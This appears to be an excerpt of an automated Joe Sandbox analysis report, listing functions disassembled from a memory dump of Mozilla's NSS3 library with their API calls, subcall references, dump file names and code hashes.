Part of subcall function 6CF49BF0: TlsGetValue.KERNEL32(?,?,?,6CF90A75), ref: 6CF49C07

Part of subcall function 6CED7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CE81CCC,00000000,00000000,?,?), ref: 6CED729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CEECD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CEECE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CEECE2C

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CEECE40

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

Part of subcall function 6CEECEE0: PORT_ArenaMark_Util.NSS3(?,6CEECD93,?), ref: 6CEECEEE
Part of subcall function 6CEECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CEECD93,?), ref: 6CEECEFC
Part of subcall function 6CEECEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CEECD93,?), ref: 6CEECF0B
Part of subcall function 6CEECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CEECD93,?), ref: 6CEECF1D

Part of subcall function 6CEECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CEECD93,?), ref: 6CEECF47
Part of subcall function 6CEECEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CEECD93,?), ref: 6CEECF67
Part of subcall function 6CEECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CEECD93,?,?,?,?,?,?,?,?,?,?,?,6CEECD93,?), ref: 6CEECF78

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 1c6f972786c19b1d0ce2537304e606e3759da55de905e3dce98dfbeaa2643449
Instruction ID: eaa424da563b50d08d8ff430165d080dab8ef17d19f5b364cbc023a78aaf79a1
Opcode Fuzzy Hash: 1c6f972786c19b1d0ce2537304e606e3759da55de905e3dce98dfbeaa2643449
Instruction Fuzzy Hash: 7B51A0B6B002009BEB10DF69DC40BAA7BF4AF4C388F350528D95597751EB31ED05CB91

Function 6CEFFFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD076,00000000), ref: 6CEFFFE5

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PR_EnterMonitor.NSS3(?), ref: 6CF00004
PR_EnterMonitor.NSS3(?), ref: 6CF0001B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: EnterMonitor$ErrorValue
String ID:
API String ID: 3413098822-0
Opcode ID: 0322b5e14e0ff0063f4a9b3a75993a77b5f4e1614778fb9f22f45124eb2fd02e
Instruction ID: e10fb62cb6cd51079ba4da20d043ce2026ad501ea685c27c148baf30b8803e01
Opcode Fuzzy Hash: 0322b5e14e0ff0063f4a9b3a75993a77b5f4e1614778fb9f22f45124eb2fd02e
Instruction Fuzzy Hash: 4F4165727446809BE7308E28DC717AB73A1DB01B08F11053DE45BCAE92E7F9E649E742

Function 6CEBEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CEBEF38

Part of subcall function 6CEA9520: PK11_IsLoggedIn.NSS3(00000000,?,6CED379E,?,00000001,?), ref: 6CEA9542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CEBEF53

Part of subcall function 6CEC4C20: TlsGetValue.KERNEL32 ref: 6CEC4C4C
Part of subcall function 6CEC4C20: EnterCriticalSection.KERNEL32(?), ref: 6CEC4C60
Part of subcall function 6CEC4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC4CA1
Part of subcall function 6CEC4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CEC4CBE
Part of subcall function 6CEC4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC4CD2
Part of subcall function 6CEC4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEC4D3A

PR_GetCurrentThread.NSS3 ref: 6CEBEF9E

Part of subcall function 6CF49BF0: TlsGetValue.KERNEL32(?,?,?,6CF90A75), ref: 6CF49C07

free.MOZGLUE(00000000), ref: 6CEBEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CEBF016
free.MOZGLUE(00000000), ref: 6CEBF022

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 4a8d8573871fd7096722aadaa893768a017c37bb4b33bc6e294b69b723ae683b
Instruction ID: feb9b9a5ead5933884b32b5392931d28398af7c7dc195d5964424ed9e29f8cd6
Opcode Fuzzy Hash: 4a8d8573871fd7096722aadaa893768a017c37bb4b33bc6e294b69b723ae683b
Instruction Fuzzy Hash: 1941D275E00209AFDF018FA8DD85BEE7BB9AF48348F104029F914B7350EB76C9158BA1

Function 6CEACF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6CEACF80
SECITEM_DupItem_Util.NSS3(?), ref: 6CEAD002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6CEAD016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEAD025
PR_NewLock.NSS3 ref: 6CEAD043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CEAD074

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: d6f80438a5734b892acff20c6121b35a11edad89567b17b9f1a3219592fd6777
Instruction ID: 4f623a4d9ec9d3abaadfa3a7714446530244852b9771435c0ddc9b2d1737b46d
Opcode Fuzzy Hash: d6f80438a5734b892acff20c6121b35a11edad89567b17b9f1a3219592fd6777
Instruction Fuzzy Hash: A241BFB8A012018FEB10DFAAC8C478A7BF5EF08318F21416ADC198F746D775D986CB91

Function 6CEF3FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CEF3FF2

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

PORT_ArenaMark_Util.NSS3(?), ref: 6CEF4001
PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6CEF400F

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6CEF4054

Part of subcall function 6CE8BB90: PORT_NewArena_Util.NSS3(00001000), ref: 6CE8BC24
Part of subcall function 6CE8BB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE8BC39
Part of subcall function 6CE8BB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6CE8BC58
Part of subcall function 6CE8BB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CE8BCBE

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEF4070
NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6CEF40CD

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
String ID:
API String ID: 3882640887-0
Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction ID: 36c9a70eb11e58ed240f65f51f80d98dac7626828e0625caa2bd226189c3e9cd
Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction Fuzzy Hash: 9831D872E0034197FB009F649D41BBB3374AF9574CF244229ED199B742FB71E99AC292

Function 6CE92E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CE82D1A), ref: 6CE92E7E

Part of subcall function 6CEE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE88298,?,?,?,6CE7FCE5,?), ref: 6CEE07BF
Part of subcall function 6CEE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CEE07E6
Part of subcall function 6CEE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE081B
Part of subcall function 6CEE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE0825

PR_Now.NSS3 ref: 6CE92EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CE92EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CE82D1A), ref: 6CE92F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CE82D1A), ref: 6CE92F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CE92F81

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 3bb0813a148e35b3334bf2297baea51f886020c7db6a1507e187d2ef4363e16e
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 5331047190110087EF20D665DC8EFBE7275EBA131CF744579D42AA7BD0EB31988ACA52

Function 6CE80E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6CE80A2C), ref: 6CE80E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CE80A2C), ref: 6CE80E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CE80A2C), ref: 6CE80E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6CE80A2C), ref: 6CE80E90
free.MOZGLUE(00000000), ref: 6CE80EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CE80A2C), ref: 6CE80ED9

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: c16442d7c2584e8f34c78a0f4fe7009ed7b76cbbd6a529cd3c74137b16a7e4b9
Instruction ID: 1fa4a20978bb97e4756a1b2185703b5294efb030753696ec31b4e84447201255
Opcode Fuzzy Hash: c16442d7c2584e8f34c78a0f4fe7009ed7b76cbbd6a529cd3c74137b16a7e4b9
Instruction Fuzzy Hash: AD213E72E036845BEF1089699C45B6B72BEDFC274CF390035DC1DA3B12EA60D81582B1

Function 6CE8AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CE8AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CE8AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE8AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6CE8AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CFA9500), ref: 6CE8AF23

Part of subcall function 6CEDF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CEDF0C8
Part of subcall function 6CEDF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CEDF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE8AF37

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 45f3844767773febffe3beb33da52c111442cdb07022053a0c9438a61c122694
Instruction ID: ce1f0aa3210c2da767b8bdbb666bb3ad0cc3e4d5697f54840cfb435cc162dff3
Opcode Fuzzy Hash: 45f3844767773febffe3beb33da52c111442cdb07022053a0c9438a61c122694
Instruction Fuzzy Hash: F2213A72946200ABE7108F189C02B9A7BF4AF8572CF244718FC189B7D1E731D54587A3

Function 6CF0EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CF0EE85
realloc.MOZGLUE(EF8FC49E,?), ref: 6CF0EEAE
PORT_Alloc_Util.NSS3(?), ref: 6CF0EEC5

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

htonl.WSOCK32(?), ref: 6CF0EEE3
htonl.WSOCK32(00000000,?), ref: 6CF0EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CF0EF01

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 74885108e7a6f4b75456a77aef4dea0807e8d671566d2c0f1e28dc9bbb6e1479
Instruction ID: ec83f518b37e267d50fa789532e1edfcadf1226e6d084e5ac09755280f2f4c6d
Opcode Fuzzy Hash: 74885108e7a6f4b75456a77aef4dea0807e8d671566d2c0f1e28dc9bbb6e1479
Instruction Fuzzy Hash: CA21F731A002189FDF109F28DC9079AB7A4EF49758F168169ED599F782E731EC14CBE2

Function 6CEBEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEBEE49

Part of subcall function 6CEDFAB0: free.MOZGLUE(?,-00000001,?,?,6CE7F673,00000000,00000000), ref: 6CEDFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CEBEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CEBEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CEBEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CEBEEB3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: f3b461c0c3b4847c8004ef406486d7fba62e68c4b5b9f1dd3d985942e3c6dc14
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 5321C3B6A006106BEB118A58EC81EBB77B8AF4570CF2941A8FD04AB341E671EC1587E1

Function 6CE87F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CE87F68

Part of subcall function 6CEE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
Part of subcall function 6CEE0FF0: PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016
Part of subcall function 6CEE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6CE87F7B

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE87FA7

Part of subcall function 6CEDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CED8D2D,?,00000000,?), ref: 6CEDFB85
Part of subcall function 6CEDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEDFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CFA919C,?), ref: 6CE87FBB

Part of subcall function 6CEDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CFB18D0,?), ref: 6CEDB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE87FCA
SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6CFA915C,00000014), ref: 6CE87FFE

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1489184013-0
Opcode ID: d5a3c28c58b3487f58e0d89e606f7acceb14fdbcbea5fa84d76e6df1a70fff86
Instruction ID: dd8d1d8a363f3cfc0ca5ff96144dc755d2b17ac2aedd1f8b55e12d84d57fa41d
Opcode Fuzzy Hash: d5a3c28c58b3487f58e0d89e606f7acceb14fdbcbea5fa84d76e6df1a70fff86
Instruction Fuzzy Hash: F2113671E0120457F7109A369C42BBB76F8DF4968CF25062DFC59C6B82FB20E949C2B1

Function 6CE8BE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6CF0DC29,?), ref: 6CE8BE64

Part of subcall function 6CEE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
Part of subcall function 6CEE0FF0: PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016
Part of subcall function 6CEE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6CF0DC29,?), ref: 6CE8BE78

